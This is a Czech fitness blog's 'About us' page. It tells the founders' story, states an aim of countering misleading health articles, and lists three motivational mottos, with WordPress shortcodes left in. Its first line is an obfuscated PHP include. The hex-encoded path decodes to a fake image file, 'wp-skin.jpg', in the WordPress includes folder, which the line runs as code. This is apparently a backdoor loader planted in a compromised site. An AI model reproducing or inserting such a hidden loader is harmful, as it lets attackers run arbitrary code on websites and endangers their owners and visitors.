@include(pack('H*', '77702d696e636c756465732f696d616765732f77702d736b696e2e6a7067')); O nás | Phoenix Never Give Up

O nás

[row] [span8] [title_box title=“Náš příběh“ subtitle=“Cesty byli různé, avšak cíl se stal stejný.“]
Jako dlouholetí kamarádi jsme několik let přemýšleli o tom jak spolu založit byznys, ale žádný z mnoha nápadů nás neoslovil a nespojoval natolik jako tato stránka.

Tak jako spousta dobrých nápadů i náš přišel z ničeho nic při rozhovoru o tom co bychom chtěli změnit. Chvíle kdy jsme se rozhodli z pouhého rozhovoru udělat skutečnost je nezapomenutelná. Místo tradičního stěžování se totiž pokoušíte něco změnit a to je super pocit. Naše snaha byla,  je a bude, vyvrátit nesmyslné články a polopravdy firem nebo lidí, kteří dali přednost lehkému nabití peněz před složitým hledáním pravdy.

Ve světě fitnes a zdravého stravování je na běžném pořádku, že jsou lidé každý den mateni novými výzkumi a proto jsme založili tuto stránku, kde se zabýváme pouze prověřenými skutečnostmi. Nebudeme Vám říkat co máte dělat, ani Vás přesvědčovat, že to co říkáme je pravda, pouze se budeme snažit Vám ukázat jak je duležité najít si svou vlastní cestu v tom nepřeberném množství informací, valících se na nás každý den ze všech stran. Ať už je to reklama v televizi, v radiu nebo na internetových stránkách.

Budeme říkat všechno tak jak je a pracovat na důvěře, kterou jste nám čtením našich článků projevili. Věříme, že je na čase aby jste nahlédli do zákulisí a měli tu možnost rozpozpoznat rozdíl mezi stránkou NEsponzorovanou  a sponzorovanou společnostmi propagující své produkty. Náš blog tedy nebude jenom o zdravé výživě, životním stylu a vůbec o fitness obecně, ale také o důvěře. Důvěře v nás, že Vám neříkáme co je dobré pro peníze, ale že si stojíme za svými názory a články.

Nemusíte se bát slohových prací, které stejně nikoho nebaví číst, protože my Vám vše naservírujeme stručně, pochopitelně a výstižně.

[spacer] [title_box title=“Inspirace“ subtitle=“Nechte se inspirovat, ale nesnažte se být jako někdo jiný“] [posts_grid type=“team“ columns=“4″ rows=“1″ order_by=“popular“ order=“DESC“ thumb_width=“160″ thumb_height=“160″ meta=“no“ excerpt_count=“10″ link=“no“ custom_class=“team“] [/span8] [span4] [title_box title=“Motto“ subtitle=“Každý se řídí svým motem a těmito my“] [dropcap]1[/dropcap] [extra_wrap]
Nikdy se nevzdávej.

Vždy věřte sami v sebe a jděte za svými sny. Prohrajete až tehdy když se vzdáte.

[/extra_wrap] [clear] [sm_hr] [dropcap]2[/dropcap] [extra_wrap]
Změňte Vaše myšlenky a změníte Váš svět.

Myslete pozitivně. Negativní mysl Vám nepřinese pozitivní život.

[/extra_wrap] [clear] [sm_hr] [dropcap]3[/dropcap] [extra_wrap]
Dokaž to, nemluv o tom.

Činy vždy nakonec ukáží, proč slova nic neznamenají.

[/extra_wrap] [clear] [spacer] [title_box title=“Ohlasy“ subtitle=“Pár slov od lidí, kteří se nebáli říct svůj názor“] [recenttesti num=“1″ thumb=“true“ excerpt_count=“20″] [/span4] [/row]